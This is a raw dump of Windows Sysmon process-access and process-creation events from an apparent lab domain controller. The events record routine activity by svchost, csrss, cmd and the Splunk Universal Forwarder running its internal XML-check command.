13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5A00-00000000A301}3832C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E5B-6005-5900-00000000A301}38403836C:\Windows\system32\cmd.exe{59A5CD1D-8E5B-6005-5A00-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.580{59A5CD1D-8E5B-6005-5A00-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.564{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.564{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.575{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.548{59A5CD1D-8E5B-6005-5800-00000000A301}38963864C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5800-00000000A301}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
